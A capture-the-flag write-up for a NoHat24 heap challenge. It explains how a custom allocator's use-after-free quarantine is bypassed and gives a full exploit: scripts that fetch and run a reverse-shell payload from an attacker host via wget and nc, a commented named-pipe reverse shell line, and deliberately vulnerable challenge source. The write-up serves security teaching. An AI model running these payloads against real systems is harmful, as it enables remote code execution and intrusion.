Exploiting a Quarantine UAF Mitigation on a Custom Allocator Challenge
Last updated
Apr 16, 2025
# Introduction
In the
previous blog post we have covered a walkthrough guide to solve the Reverse Engineering challenge written for the
NoHat24 security conference. In this blog post, we are going to cover the binary exploitation challenge that involves a custom userland allocator that has been specifically developed for this challenge. Writing our own allocator, remotely inspired from the kernel SLUB allocator, was a really fun and educational experience. We have implemented an Use-After-Free quarantine mitigation to prevent its exploitation, was it good enough?
# Introducing the Custom Allocator
The custom allocator source code was available through an HTTP web interface and can now be download directly from
here.
The two files hmalloc.h
and hmalloc.c
contains the whole implementation of the custom allocator that replaces the standard glibc malloc. The following diagram and structs describes the allocator design:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| struct list_head{
struct list_head* next;
struct list_head* prev;
};
struct bucket{
struct list_head buckets;
/* Offset of the available alloc inside the bucket */
uint16_t offset;
/* How many allocs are freed */
uint8_t freelist_count;
uint8_t freelist[MAX_ALLOCS];
void* allocs[];
};
/* Single allocations just contain the size of the alloc as metadata */
struct alloc{
uint16_t size;
void* user[];
} __attribute__((packed));
|
The target allocator, inspired from the kernel SLUB allocator, has a simple “bucket” concept. Each allocation size (from 16 to 1024) has its own memory region retrieved from mmap
(through __init_bucket
) and it is considered a SMALL_BUCKET
, while larger buckets (LARGE_BUCKETS
) are not handled from the allocator. A Bucket Master Control (bucket_master_ctrl
global variable inside hmalloc.c
) is used to store buckets’ addresses using an offset that can be used to retrieve the requested bucket for the needed size. The size of the allocation is the offset minus the size of a pointer. For example, the bucket address for 32 bytes allocations is at offset 24 (32-8).
When malloc
is called the first time with a specific size, that is always rounded to the nearest power of two starting from 32 (e.g. 32, 64, 128, 256, 512, 1024), the bucket is allocated through __init_bucket
and referred to as the current_bucket
. The current bucket is the bucket from where we try to initially allocate from. It can be retrieved, once allocated, using __get_bucket
. Each allocation, named alloc
inside the source code, contains just the size of the allocation as metadata and alloc->user
is the returned malloc
pointer. When an alloc
is allocated from a bucket
, the bucket->offset
is incremented by one and used for the next allocations to return subsequent memory addresses (it is always multiplied with the allocation size). The offset does not just provides the capability to return new allocations but also marks and identifies freed allocations inside the bucket. A freelist is implemented to first return freed memory (to avoid fragmentation) with a LIFO mechanism. bucket->freelist
is an array of freed allocs
(based on their offsets) that can be accessed with the bucket->freelist_count
that is incremented every time an alloc
is freed and decremented when a freed allocation is returned back to the user. This “dynamic” array permits to handle the freelist pretty easily and is the first path to return an allocation from the __malloc
logic.
When the maximum number of allocations ((PAGE_SIZE - sizeof(struct bucket)) / alloc_size
) is reached for a bucket, a new bucket is created (through new mmap
memory) and linked through the list_head
next
and prev
members.
1
2
| old_current_bucket->buckets.next = (struct list_head*) ¤t_bucket->buckets.next;
current_bucket->buckets.prev = (struct list_head*) &old_current_bucket->buckets.next;
|
The linked list permits to have more buckets linked together for each allocation size. When the current bucket is full (e.g. it is not possible to re-allocate freed allocs neither new allocs) previous and next buckets are verified (traversing the linked list backwards and forwards) and an allocation is returned if one of them contains a freed alloc on its freelist. Also, if the found bucket contains more than a specific amount of freed elements (FREELIST_REPLACE_BUCKET_THRESHOLD
) it is replaced as the current bucket from the bucket_master_ctrl
(through __update_master_ctrl_bucket
).
When free
is called with a pointer, the alloc
struct is retrieved through ptr - sizeof(struct alloc)
and the bucket obtained masking the pointer with 0xfff
(memory returned from mmap
is always page aligned). In order to calculate its offset inside the bucket, the allocation size retrieved from the metadata of the alloc
is used as a dividend to the allocation address minus bucket->allocs
(e.g. the first alloc is 0, the second 1, the third 2 and so on). The bucket->freelist[]
array is updated with the calculated offset and bucket->freelist_count
incremented by one.
# Freelist quarantine mitigation
Before leaving the free
function, a global freelist_quarantine_time
variable is set with the current time. When verifying the freelist of the current bucket, the function __is_freelist_available
verify its availability. It is possible to return a freed alloc only if ten seconds (FREELIST_QUARANTINE_WAIT
) are passed from the last freed element:
1
2
3
4
5
6
7
8
9
10
| bool __is_freelist_available(){
#ifdef FREELIST_QUARANTINE
if((time(NULL) - freelist_quarantine_time) < FREELIST_QUARANTINE_WAIT){
DEBUG_PRINT("[DEBUG] Freelist is quarantined\n");
return false;
}
return true;
#endif
return true;
}
|
This mitigations is aimed to prevent the immediate re-use of freed allocations (Use-After-Free vulnerabilities).
# Freelist quarantine Weakness
However, the mitigation is not bullet proof, and this is the intended objective of the CTF. The freelist timer is only checked while searching for freed allocs inside the same bucket, but not when traversing. Suppose the following scenario:
- Two buckets (
bucket_1
and bucket_2
) are fully allocated (e.g. no available or freed allocations). bucket_2
is the “current” one (the one registered in the Bucket Master Control). - An alloc is freed from
bucket_1
. - When
malloc
is called (with the same size of the two buckets) the freelist of bucket_2
is not available while, with traversing, the just freed alloc from bucket_1
is immediately available.
The described scenario can be useful to exploit an immediate UaF condition.
# Main binary logic
The main binary logic (main.c
) is pretty simple. It reads from stdin 4096
bytes and parses it line by line, searching for commands to execute inside a switch
statement. Each line must begin with a valid command (CMD_CREATE
, CMD_ADD
, CMD_DELETE
, CMD_SELL
, CMD_DROP
) and follows a command specific format. For example, the CMD_CREATE
command allocates a struct object
(using malloc
) where malloc
is also used to allocate object->name
and object->description
using strlen
with some size validation. At the end of the command, the three function pointers (sell
, add
and drop
) are respectively set with function_sell
, function_add
and function_drop
, just like a primitive OOP language.
This is the mentioned struct:
1
2
3
4
5
6
7
8
9
10
11
| struct object{
int id;
int price;
char* name;
char* description;
int stock;
int earnings;
void (*sell) (struct object* this);
void (*add) (struct object* this);
void (*drop) (struct object* this);
};
|
Also, when a new object
is allocated, an array of object pointers (objs
) is updated to store all of them. The array is later used for the vtable functions (sell
, add
and drop
) and to delete an object based on its specified id.
# The vulnerability (UAF)
The vulnerability is pretty straightforward: when an object is freed (through CMD_FREE
), the objs
array is not updated and the dangling pointer can be still accessed without further validations from another command (Use-After-Free) or itself (Double Free).
However, there is just one big obstacle: the freelist quarantine mitigation does not permit an immediate Use-After-Free. In order to exploit the UAF, it is necessary to re-create an heap layout similar to the one described in “Freelist quarantine Weakness”, where we can trigger the UAF against an allocation from a non current bucket.
# Exploitation
# Objective
Let’s first declare an objective. As simple as it sounds, we want to compromise the binary application (that is exposed through socat
) and read the flag. We have a UAF primitive on a struct object
that contains interesting members: dynamic strings (that we can use to overlap the freed allocation) and three function pointers. Function pointers, that behave like a vtable, seems like a really juicy target since they are allocated in the heap (inside the object structure) and can be triggered from multiple commands. Name and description members are really interesting allocations that can be used to replace the freed alloc due to their flexible size based on user input.
Also, since we have a single interaction with the program (we pass everything through stdin once) we cannot use read primitives or similar to leak ASLR. We can go for a bruteforce or a partial overwrite in order to don’t mess too much with randomized pointers.
# Heap shaping to bypass the quarantine
With a clearer path in mind, let’s start to create the UAF state with python step by step:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| objs = []
content = ""
# Objective:
# Allocate 2 64 bytes buckets and make them full
# 520 = sizeof(struct bucket)
# 4096 - 520 = 3576 / 64 = 55
for n in range(0, 55 * 2):
obj_id = pack("<h", int(n)).decode()
objs.append(obj_id)
# print_stderr("[*] Creating object {}".format(n))
# Create
content += "\x10" # CMD_CREATE
content += obj_id
content += "\x16\x00"
content += "\x41" * 20 + "\x00"
content += "\x42" * 4 + "\x00"
content += "\n"
|
We fulfill two buckets (bucket_1
and bucket_2
) with 110 allocations of struct object
. The size of struct object
is 58
, hence it goes into the bucket of 64 bytes allocations (we can call it bucket_64
). The bucket_64
can contains up to 55 allocations since the PAGE_SIZE
memory region (4096) minus the size of the struct bucket
metadata (520) and divided by its size (64), it’s 55.
1
2
3
4
5
6
7
8
9
| # DELETE (Free)
content += "\x12"
content += objs[0]
content += "\n"
# DELETE (Free)
content += "\x12"
content += objs[1]
content += "\n"
|
We then proceed to free the first two allocations from bucket_1
. We free two of them since the last one (due to the LIFO freelist order) will be replaced, using the CMD_CREATE
command, with another struct object
(malloc(sizeof(struct object));
) and initialized with zeros (removing the possibility of a partial overwrite to bypass ASLR). The first freed allocation, instead, can be replaced with arbitrary user input due to the dynamic allocation through strlen
. Due to this function, however, we are limited to its internal behaviors (e.g. it is not possible to have NULL bytes inside our payload).
# Partial Overwrite
We can create, through CMD_CREATE
, a fake object inside the name
or the description
string allocation, by making its size falling inside the bucket_64
, in order to trigger the UAF against it.
We can perform a partial overwrite through the memcpy
function (on the freed object) by replacing one or two bytes in order to not affect ASLR at all. execute_system
is an interesting function that accepts a char pointer and pass it as a parameter to system
, allowing the execution of arbitrary shell code. It can be a really interesting primitive due to a crucial thing: the rdi
register (e.g. the first parameter) is the object itself (this
) for function pointers. This means that, if we can redirect the execution to execute_system
, we control entirely the first parameter that is the command to be executed! In order to see what we need to partially overwrite, we can execute objdump
against the binary:
1
2
3
| $ objdump -D -M intel main | grep '<execute_system\|function_drop'
0000000000001270 <execute_system>:
00000000000012c0 <function_drop>:
|
The function_drop
address is 00000000000012c0
, while execute_system
is 0000000000001270
. If we overwrite the last byte of the object->drop
pointer with 0x70
and we execute the CMD_DROP
command later, we can trigger the execution of system
with input in our control (the last allocated object itself):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| # ID & price
fake_obj = "AA;$({});#".format(cmd)
#fake_obj += "\x41" * 0x2c
fake_obj += "\x41" * ( 0x30 - len(fake_obj) )
# CMD_DROP function pointer => @execute_system
# @execute_system
fake_obj += "\x70" + "\x00"
# Create => alloc bucket1->freelist[1]
content += "\x10"
content += "\x37\x13" # sh
content += "\x16\x00"
# Name: system payload
content += "BB\x00"
# Description: alloc on bucket1->freelist[0] (obj[0])
content += fake_obj
content += "\n"
# CMD_DROP => Trigger arbitrary function call
content += "\x14"
content += "\x41\x41"
content += "\n"
|
Since the struct object
allocation is limited in size for a direct reverse shell, the vulnerability is exploited three times to first upload a complete reverse shell through wget
, chmod
and finally execute it.
# Alternative Solution (Double Free)
An alternative, originally not the intended solution, can be to exploit the Double Free vulnerability instead. It is possible to return the same alloc
twice by inserting (through exploitation) the same freelist offset inside the bucket->freelist
and achieve the same objective. If you have solved the challenge in that way at the NoHat CTF or in a different moment, we are really curious about that, let us know!
# Conclusion
The final exploit can be found
here. Hope you have enjoyed this two article series on our CTF write-ups for the NoHat24 CTF event.
# Appendix
# Exploit Code
exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| #!/bin/bash
if [ "$#" -ne 4 ]; then
echo "$0 <RHOST> <RPORT> <LHOST> <LPORT>"
exit
fi
RHOST=$1
RPORT=$2
LHOST=$3
LPORT=$4
echo "[*] Generating payload for the three stages"
python3 generate_input_files.py $LHOST
echo "[*] Modifying script reverse shell to $LHOST:$LPORT"
sed -e "s/LHOST/$LHOST/g" -e "s/LPORT/$LPORT/g" rev.sh > e
python3 generate_input_files.py $LHOST
echo "[*] Starting web browser"
python3 -m http.server&
sleep 1
echo "[*] Sending stage 1 to $RHOST $PORT - wget http://$LHOST:8000/e"
nc -v $RHOST $RPORT < input_file_1
echo "[+] Done"
sleep 1
echo "[*] Sending stage 2 to $RHOST $PORT"
nc -v $RHOST $RPORT < input_file_2
echo "[+] Done"
sleep 1
echo "[*] Sending stage 3 to $RHOST $PORT.. The uploaded script should be executed"
nc -v $RHOST $RPORT < input_file_3
echo "[+] Done"
sleep 1
# kill web server
pkill python3
|
generate_input_files.py
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
| from struct import pack
import sys
def print_stderr(msg):
sys.stderr.write(msg + "\n")
def exploit(cmd, filename):
objs = []
content = ""
# Objective:
# Allocate 2 64 bytes buckets and make them full
# 520 = sizeof(struct bucket)
# 4096 - 520 = 3576 / 64 = 55
for n in range(0, 55 * 2):
obj_id = pack("<h", int(n)).decode()
objs.append(obj_id)
# print_stderr("[*] Creating object {}".format(n))
# Create
content += "\x10"
content += obj_id
content += "\x16\x00"
content += "\x41" * 20 + "\x00"
content += "\x42" * 4 + "\x00"
content += "\n"
# Status
# Bucket 1: Fully allocated
# Bucket 2: Fully allocated (current)
# Free two allocations from bucket 1
# Since bucket 2 is current and the traversing doesn't involve the
# quarantine mitigation, we can bypass it
# DELETE (Free)
content += "\x12"
content += objs[0]
content += "\n"
# DELETE (Free)
content += "\x12"
content += objs[1]
content += "\n"
# ID & price
fake_obj = "AA;$({});#".format(cmd)
#fake_obj += "\x41" * 0x2c
fake_obj += "\x41" * ( 0x30 - len(fake_obj) )
# CMD_DROP function pointer
# @execute_system
fake_obj += "\x70" + "\x00"
# Create => alloc bucket1->freelist[1]
content += "\x10"
content += "\x37\x13" # sh
content += "\x16\x00"
# Name: system payload
# content += ";mknod /tmp/mypipe p ; /bin/bash 0< /tmp/mypipe | nc 127.0.0.1 4445 1> /tmp/mypipe\x00"
content += "BB\x00"
# Description: alloc on bucket1->freelist[0] (| obj[0])
content += fake_obj
content += "\n"
# DROP => Trigger arbitrary function call
content += "\x14"
content += "\x41\x41"
content += "\n"
with open(filename, "w") as f:
f.write(content)
print_stderr("[+] {} generated".format(filename))
if __name__ == "__main__":
exploit("wget http://{}:8000/e -O /tmp/e".format(sys.argv[1]), "input_file_1")
exploit("chmod +x /tmp/e", "input_file_2")
exploit("/tmp/e", "input_file_3")
|
# Challenge Source Code
main.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
| #include <stdio.h>
#include "hmalloc.h"
#define CMD_CREATE 0x10
#define CMD_ADD 0x11
#define CMD_DELETE 0x12
#define CMD_SELL 0x13
#define CMD_DROP 0x14
#define MAX_OBJS 1000
#define BUF_SZ 4096
#define MAX_STRING_SZ 1024
int total_earnings = 0;
int total_stocks = 0;
int total_objs = 0;
struct object* objs[MAX_OBJS];
struct object{
int id;
int price;
char* name;
char* description;
int stock;
int earnings;
void (*sell) (struct object* this);
void (*add) (struct object* this);
void (*drop) (struct object* this);
};
void function_sell(struct object* this){
printf("CMD_SELL\n");
if(this->stock <= 0)
return;
this->stock--;
this->earnings = this->earnings + this->price;
}
void function_add(struct object* this){
printf("CMD_ADD\n");
this->stock++;
}
void execute_system(const char* cmd){
system(cmd);
}
void notify_end(){
const char* cmd = "touch /tmp/end";
execute_system(cmd);
}
void function_drop(struct object* this){
printf("CMD_DROP\n");
this->stock--;
}
void show_object(struct object* obj){
printf("\tid: 0x%x\n", obj->id);
printf("\tPrice: %d\n", obj->price);
printf("\tName: %s\n", obj->name);
printf("\tDescription: %s\n", obj->description);
printf("\tStock: %d\n", obj->stock);
printf("\tEarnings: %d\n", obj->earnings);
}
struct object* get_object(short int obj_id){
// Search for the product id
int j = 0;
while(j < total_objs){
if((short int) objs[j]->id == obj_id)
return objs[j];
j++;
}
return NULL;
}
int main(){
char raw_input[BUF_SZ];
int n_read;
size_t n;
struct object* obj;
int obj_id;
memset(raw_input, 0x0, BUF_SZ);
/* Parse file from input */
n_read = read(0, raw_input, BUF_SZ);
int idx = 0;
while(idx < n_read){
int command = raw_input[idx];
idx++;
switch(command){
case CMD_CREATE:
printf("CMD_CREATE\n");
obj = malloc(sizeof(struct object));
memset(obj, 0x0, sizeof(struct object));
/* Object ID*/
memcpy(&obj->id, raw_input + idx, 2);
idx = idx + 2;
/* Object Price*/
memcpy(&obj->price, raw_input + idx, 2);
idx = idx + 2;
/* Object name */
n = strlen((char*) raw_input + idx);
if(n == 0 || n > MAX_STRING_SZ || (idx + n) > n_read)
return -1;
obj->name = malloc(n);
memcpy(obj->name, raw_input + idx, n);
idx = idx + n + 1;
/* Object description */
n = strlen((char*) raw_input + idx);
if(n == 0 || n > MAX_STRING_SZ || (idx + n) > n_read)
return -1;
obj->description = malloc(n);
memcpy(obj->description, raw_input + idx, n);
idx = idx + n + 1;
obj->sell = function_sell;
obj->add = function_add;
obj->drop = function_drop;
if(total_objs > MAX_OBJS)
return -1;
objs[total_objs] = obj;
total_objs++;
break;
case CMD_DROP:
case CMD_ADD:
case CMD_SELL:
memcpy(&obj_id, raw_input + idx, 2);
idx = idx + 2;
obj = get_object(obj_id);
if(obj == NULL)
break;
if(command == CMD_ADD)
obj->add(obj);
else if(command == CMD_DROP)
obj->drop(obj);
else if(command == CMD_SELL)
obj->sell(obj);
break;
case CMD_DELETE:
printf("CMD_DELETE\n");
memcpy(&obj_id, raw_input + idx, 2);
idx = idx + 2;
obj = get_object(obj_id);
if(obj == NULL)
break;
free(obj->name);
free(obj->description);
free(obj);
break;
default:
fprintf(stdout, "Command 0x%x not found\n", command);
return -1;
break;
}
if(raw_input[idx] != 0x0a){
fprintf(stderr, "Missing newline");
exit(EXIT_FAILURE);
}
idx++;
}
notify_end();
return 0;
}
|
hmalloc.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
| #ifndef HMALLOC_H
#define HMALLOC_H
#include <stdint.h>
#include <sys/types.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/mman.h>
#include <time.h>
#include <unistd.h>
//#define DEBUG
#ifdef DEBUG
#define DEBUG_PRINT(fmt, args...) fprintf(stderr, fmt, ## args)
#else
#define DEBUG_PRINT(fmt, args...)
#endif
#define PAGE_SZ 4096
#define MAX_ALLOCS 500
/*
* Small buckets: 16, 32, 64, 128, 256, 512, 1024
* Large buckets (not YET supported) : >= 2048
*/
#define SMALL_BUCKET_PAGES 1
#define SMALL_BUCKET_MIN_SZ 16
#define SMALL_BUCKET_MAX_SZ 1024
#define SMALL_BUCKET_MASK ~0xFFF // 1 PAGE
#define LARGE_BUCKET_MIN_SZ 2048
#define LARGE_BUCKET_PAGES 4
//#define LARGE_BUCKET_MASK 0xFFFFFFFFC000 // 4 PAGES
//#define LARGE_BUCKET_MASK TODO
#define FREELIST_REPLACE_BUCKET_THRESHOLD 3
/* 10 seconds */
#define FREELIST_QUARANTINE
#define FREELIST_QUARANTINE_WAIT 10
#define BUCKET_MAX_SZ 2048
typedef uint64_t bool;
#define true 1
#define false 0
struct list_head{
struct list_head* next;
struct list_head* prev;
};
struct bucket{
struct list_head buckets;
/* Offset of the available alloc inside the bucket */
uint16_t offset;
/* How many allocs are freed */
uint8_t freelist_count;
uint8_t freelist[MAX_ALLOCS];
void* allocs[];
};
/* Single allocations just contain the size of the alloc as metadata */
struct alloc{
uint16_t size;
void* user[];
} __attribute__((packed));
void* malloc(size_t size);
void free(void* ptr);
bool __hmalloc_init();
void* __malloc(size_t size);
size_t __round_up_size(size_t sz);
size_t __bucket_max_allocations(size_t alloc_size);
struct bucket* __get_bucket(size_t alloc_size);
struct bucket* __get_bucket_from_alloc(struct alloc* target_alloc);
static inline void __update_master_ctrl_bucket(size_t alloc_size, struct bucket* b);
void* __fastpath_new_bucket_alloc(struct bucket* bucket, size_t alloc_size);
bool __is_freelist_available();
void __dump_bucket(struct bucket* b);
void __dump_alloc(struct alloc* a);
#endif // HMALLOC_H
|
hmalloc.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
| #include "hmalloc.h"
/*
* TODO: Single buckets are never unmmaped
*/
void** bucket_master_ctrl = NULL;
time_t freelist_quarantine_time = 0;
size_t __round_up_size(size_t size) {
int power = 32;
while(power < size)
power*=2;
return power;
}
void __dump_bucket(struct bucket* b){
DEBUG_PRINT("[DEBUG]\tstruct bucket {\n");
DEBUG_PRINT("\t\tnext: %p\n", b->buckets.next);
DEBUG_PRINT("\t\tprev: %p\n", b->buckets.prev);
DEBUG_PRINT("\t\toffset: %d\n", b->offset);
DEBUG_PRINT("\t\tfreelist_count: %d\n", b->freelist_count);
for(int i=0; i < b->freelist_count; i++)
DEBUG_PRINT("\t\tfreelist[%d]: %d\n", i, b->freelist[i]);
DEBUG_PRINT("\t\tallocs: %p\n", b->allocs);
DEBUG_PRINT("\t}\n[/DEBUG]\n");
}
void __dump_alloc(struct alloc* a){
DEBUG_PRINT("[DEBUG]\tstruct alloc {\n");
DEBUG_PRINT("\t\tsize: %d\n", a->size);
DEBUG_PRINT("\t\tuser: %p\n", a->user);
DEBUG_PRINT("\t}\n[/DEBUG]\n");
}
bool __hmalloc_init(){
bucket_master_ctrl = mmap(NULL, PAGE_SZ, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);
if(bucket_master_ctrl == MAP_FAILED){
perror("mmap");
return false;
}
//DEBUG_PRINT("[DEBUG] HMALLOC initialized with bucket_master_ctrl = %p\n", bucket_master_ctrl);
memset(bucket_master_ctrl, 0x0, PAGE_SZ);
return true;
}
struct bucket* __init_bucket(size_t size){
struct bucket* bucket;
DEBUG_PRINT("Initializing small bucket with %d pages\n", SMALL_BUCKET_PAGES);
bucket = mmap(NULL, PAGE_SZ * SMALL_BUCKET_PAGES, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);
memset(bucket, 0x0, PAGE_SZ * SMALL_BUCKET_PAGES);
return bucket;
}
size_t __bucket_max_allocations(size_t alloc_size){
return ((PAGE_SZ * SMALL_BUCKET_PAGES) - sizeof(struct bucket)) / alloc_size;
}
struct bucket* __get_bucket(size_t alloc_size){
off_t off = alloc_size - sizeof(void*);
return *(void**)((void*) bucket_master_ctrl + off);
}
struct bucket* __get_bucket_from_alloc(struct alloc* target_alloc){
return (struct bucket*) ((uint64_t) target_alloc & SMALL_BUCKET_MASK);
}
static inline void __update_master_ctrl_bucket(size_t alloc_size, struct bucket* bck){
off_t off = alloc_size - sizeof(void*);
*(void**) ((void*) bucket_master_ctrl + off) = bck;
}
void* __fastpath_new_bucket_alloc(struct bucket* b, size_t alloc_size){
// return the pointer to the first allocation of a newly allocated bucket
struct alloc* alloc = (struct alloc*) b->allocs;
alloc->size = alloc_size;
b->offset++;
return alloc->user;
}
bool __is_freelist_available(){
#ifdef FREELIST_QUARANTINE
if((time(NULL) - freelist_quarantine_time) < FREELIST_QUARANTINE_WAIT){
return false;
}
return true;
#endif
return true;
}
void* malloc(size_t size){
void* alloc;
if(!bucket_master_ctrl){
if(!__hmalloc_init())
return NULL;
}
alloc = __malloc(size);
DEBUG_PRINT("malloc(%zu) = %p\n", size, alloc);
return alloc;
}
void* __malloc(size_t input_size){
size_t alloc_size;
off_t bucket_offset;
off_t offset;
struct bucket* current_bucket;
struct bucket* old_current_bucket;
struct bucket* linked_bucket;
struct alloc* alloc;
uint8_t freelist_count = 0;
size_t bucket_max_allocs = 0;
/* Size validation */
if(input_size == 0)
return NULL;
DEBUG_PRINT("\n+++++++++ MALLOC +++++++++\n");
alloc_size = __round_up_size(input_size + sizeof(struct alloc));
if(alloc_size > SMALL_BUCKET_MAX_SZ){
/* TODO: Not implemented */
return NULL;
}
/* Retrieve, or initialize, the appropriate bucket based on alloc_size */
current_bucket = __get_bucket(alloc_size);
/* If the bucket is not initialized, do it */
if(current_bucket == NULL){
current_bucket = __init_bucket(alloc_size);
if(current_bucket == NULL){
perror("__init_bucket: mmap");
return NULL;
}
DEBUG_PRINT("[DEBUG] Bucket %zu initialized: %p\n", alloc_size, current_bucket);
// Store the bucket inside the Bucket Master Control
__update_master_ctrl_bucket(alloc_size, current_bucket);
}
DEBUG_PRINT("[DEBUG] current_bucket (%zu) = %p\n", alloc_size, current_bucket);
__dump_bucket(current_bucket);
/* 1. Verify if we have freed allocs inside the current_bucket */
freelist_count = current_bucket->freelist_count;
if(freelist_count && __is_freelist_available()){
offset = current_bucket->freelist[(current_bucket->freelist_count - 1)];
alloc = (void*) current_bucket->allocs + ( offset * alloc_size);
current_bucket->freelist_count--;
DEBUG_PRINT("[DEBUG] Alloc retrieved from the freelist with offset %ld: %p\n", offset, alloc);
return alloc->user;
}
/* 2. Verify if we can alloc from the current bucket */
bucket_max_allocs = __bucket_max_allocations(alloc_size);
bucket_offset = current_bucket->offset;
if(bucket_offset != bucket_max_allocs){
// We still have allocs to return!
if(bucket_offset > bucket_max_allocs){
DEBUG_PRINT("!! bucket_offset should never exceeds its maximum allocations!\n");
return NULL;
}
alloc = (struct alloc*) ((void*) current_bucket->allocs + (bucket_offset * alloc_size));
alloc->size = alloc_size;
current_bucket->offset++;
__dump_alloc(alloc);
return alloc->user;
}
// From now on, bucket_offset == bucket_max_allocs (e.g. bucket is full)
/* 3. If we have linked buckets, verify them as well */
// Traverse backwards first
if(current_bucket->buckets.prev){
linked_bucket = (struct bucket*) current_bucket->buckets.prev;
while(linked_bucket != NULL){
// Traverse
DEBUG_PRINT("[DEBUG] linked bucket %p\n", linked_bucket);
__dump_bucket(linked_bucket);
if(linked_bucket->freelist_count == 0){
linked_bucket = (struct bucket*) linked_bucket->buckets.prev;
continue;
}
// If here we have a freed alloc
offset = linked_bucket->freelist[(linked_bucket->freelist_count - 1)];
alloc = (void*) linked_bucket->allocs + ( offset * alloc_size);
linked_bucket->freelist_count--;
// Verify if this bucket has enough freed allocs to replace the current bucket
if(linked_bucket->freelist_count >= FREELIST_REPLACE_BUCKET_THRESHOLD){
__update_master_ctrl_bucket(alloc_size, linked_bucket);
}
// Return the alloation directly from here
DEBUG_PRINT("[DEBUG] Returing alloc %p from bucket %p with traversing\n", alloc, linked_bucket);
return alloc->user;
}
}
// Traverse forward
if(current_bucket->buckets.next){
linked_bucket = (struct bucket*) current_bucket->buckets.next;
while(linked_bucket != NULL){
// Traverse
DEBUG_PRINT("[DEBUG] linked bucket %p\n", linked_bucket);
__dump_bucket(linked_bucket);
if(linked_bucket->freelist_count == 0){
linked_bucket = (struct bucket*) linked_bucket->buckets.next;
continue;
}
// If here we have a freed alloc
offset = linked_bucket->freelist[(linked_bucket->freelist_count - 1)];
alloc = (void*) linked_bucket->allocs + ( offset * alloc_size);
linked_bucket->freelist_count--;
// Verify if this bucket has enough freed allocs to replace the current bucket
if(linked_bucket->freelist_count >= FREELIST_REPLACE_BUCKET_THRESHOLD){
DEBUG_PRINT("[DEBUG] Master bucket updated with %p\n", linked_bucket);
__update_master_ctrl_bucket(alloc_size, linked_bucket);
}
// Return the alloation directly from here
DEBUG_PRINT("[DEBUG] Returing alloc %p from bucket %p with traversing\n", alloc, linked_bucket);
return alloc->user;
}
}
/* 4. If everything fails, allocate a new bucket */
old_current_bucket = current_bucket;
current_bucket = __init_bucket(alloc_size);
if(current_bucket == NULL){
perror("__init_bucket: mmap");
return NULL;
}
DEBUG_PRINT("[DEBUG] New bucket %zu initialized: %p\n", alloc_size, current_bucket);
// update list_heads
old_current_bucket->buckets.next = (struct list_head*) ¤t_bucket->buckets.next;
current_bucket->buckets.prev = (struct list_head*) &old_current_bucket->buckets.next;
// Update the Bucket Master Control with the new bucket
__update_master_ctrl_bucket(alloc_size, current_bucket);
alloc = __fastpath_new_bucket_alloc(current_bucket, alloc_size);
__dump_alloc(alloc);
__dump_bucket(current_bucket);
return alloc;
}
void free(void* ptr){
struct alloc* current_alloc;
struct bucket* current_bucket;
uint16_t offset;
if(ptr == NULL){ return; }
DEBUG_PRINT("\n+++++++++ FREE +++++++++\n");
/* 1. Retrieve the bucket based on the size */
current_alloc = ptr - sizeof(struct alloc);
DEBUG_PRINT("[DEBUG] Freeing alloc %p\n", current_alloc);
if(current_alloc->size > SMALL_BUCKET_MAX_SZ) {
// Should never be here since we still don't deal with that sizes
return;
}
current_bucket = __get_bucket_from_alloc(current_alloc);
DEBUG_PRINT("[DEBUG] Retrieved current bucket for %d is: %p\n", current_alloc->size, current_bucket);
/* 2. Update the bucket freelist count and freelist array */
offset = ( (void*) current_alloc - (void*) current_bucket->allocs ) / current_alloc->size;
current_bucket->freelist[current_bucket->freelist_count] = offset;
current_bucket->freelist_count++;
freelist_quarantine_time = time(NULL);
__dump_bucket(current_bucket);
}
|